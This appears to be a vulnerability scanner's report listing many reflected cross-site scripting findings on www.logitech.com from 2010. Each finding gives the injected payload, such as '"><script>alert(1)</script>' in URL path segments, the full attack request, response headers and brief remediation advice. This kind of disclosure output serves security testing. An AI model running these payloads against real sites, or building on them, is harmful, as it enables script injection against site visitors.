The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c1d</script><script>alert(1)</script>7062d269f78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c0c1d</script><script>alert(1)</script>7062d269f78/69/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abdb0"%3b327c5a1e009 was submitted in the REST URL parameter 1. This input was echoed as abdb0";327c5a1e009 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /abdb0"%3b327c5a1e009/69/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:03:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83655"><script>alert(1)</script>dd3a2819e8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /83655"><script>alert(1)</script>dd3a2819e8b/69/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1a9e</script><script>alert(1)</script>3643c5a0f1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/69e1a9e</script><script>alert(1)</script>3643c5a0f1b/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5ea1"><script>alert(1)</script>7f78ff9adfc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/69e5ea1"><script>alert(1)</script>7f78ff9adfc/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 965f9"%3b661d419ef21 was submitted in the REST URL parameter 1. This input was echoed as 965f9";661d419ef21 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /965f9"%3b661d419ef21/69/6053&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acd08"><script>alert(1)</script>5df86dd9b1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /acd08"><script>alert(1)</script>5df86dd9b1c/69/6053&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62eb5</script><script>alert(1)</script>7d63c6922a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /62eb5</script><script>alert(1)</script>7d63c6922a9/69/6053&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7613"><script>alert(1)</script>bb2dba851bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/69f7613"><script>alert(1)</script>bb2dba851bc/6053&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 418ba</script><script>alert(1)</script>2b41131ddd9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/69418ba</script><script>alert(1)</script>2b41131ddd9/6053&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18b12</script><script>alert(1)</script>40d3c2792c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/69/605318b12</script><script>alert(1)</script>40d3c2792c&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df352"><script>alert(1)</script>eb561e547dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/69/6053df352"><script>alert(1)</script>eb561e547dd&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64db5</script><script>alert(1)</script>83e5bba93a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /64db5</script><script>alert(1)</script>83e5bba93a8/keyboards/keyboard_mice_combos/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce3e5"><script>alert(1)</script>fe17e8e9a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /ce3e5"><script>alert(1)</script>fe17e8e9a8/keyboards/keyboard_mice_combos/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54269</script><script>alert(1)</script>a8a38ebebf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/keyboards54269</script><script>alert(1)</script>a8a38ebebf0/keyboard_mice_combos/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd5b5"><script>alert(1)</script>744d0b56073 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/keyboardsfd5b5"><script>alert(1)</script>744d0b56073/keyboard_mice_combos/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17170"><script>alert(1)</script>78395098337 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/keyboards/keyboard_mice_combos17170"><script>alert(1)</script>78395098337/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb8f8</script><script>alert(1)</script>7b02c05a5e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/keyboards/keyboard_mice_combosfb8f8</script><script>alert(1)</script>7b02c05a5e5/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37996</script><script>alert(1)</script>87aac30ece6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /37996</script><script>alert(1)</script>87aac30ece6/keyboards/keyboards/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d87"><script>alert(1)</script>8473691d8f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /95d87"><script>alert(1)</script>8473691d8f6/keyboards/keyboards/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 757c6</script><script>alert(1)</script>081f325c50a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/keyboards757c6</script><script>alert(1)</script>081f325c50a/keyboards/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae0fc"><script>alert(1)</script>d69091f7387 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/keyboardsae0fc"><script>alert(1)</script>d69091f7387/keyboards/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5607b</script><script>alert(1)</script>5f341acf0b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/keyboards/keyboards5607b</script><script>alert(1)</script>5f341acf0b9/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 719be"><script>alert(1)</script>bcf18e03887 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/keyboards/keyboards719be"><script>alert(1)</script>bcf18e03887/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50fd2"%3bfe23a5611d8 was submitted in the REST URL parameter 1. This input was echoed as 50fd2";fe23a5611d8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
